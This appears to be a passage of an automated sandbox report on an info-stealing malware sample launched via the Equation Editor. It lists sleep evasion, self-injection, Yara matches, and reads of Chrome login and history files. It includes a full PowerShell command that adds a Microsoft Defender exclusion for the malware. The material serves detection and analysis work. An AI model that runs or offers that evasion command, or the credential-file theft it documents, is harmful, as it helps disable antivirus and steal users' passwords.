Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 1D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 21B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 3E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 5740000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 6740000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 6880000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 7880000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 3D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 23B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: 780000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3765
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3545
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Window / User API: threadDelayed 9196
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Window / User API: threadDelayed 608
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3792 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 3852 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2240 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2476 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4060 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 2992 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 1424 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 1424 Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 1844 Thread sleep count: 9196 > 30
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 1844 Thread sleep count: 608 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, COVID19.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe"
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Memory written: C:\Users\user\AppData\Roaming\millitingacy20306.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\millitingacy20306.exe "C:\Users\user\AppData\Roaming\millitingacy20306.exe"
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process created: C:\Users\user\AppData\Roaming\millitingacy20306.exe "C:\Users\user\AppData\Roaming\millitingacy20306.exe"
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Queries volume information: C:\Users\user\AppData\Roaming\millitingacy20306.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Remote Access Functionality

Source: Yara match File source: 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTR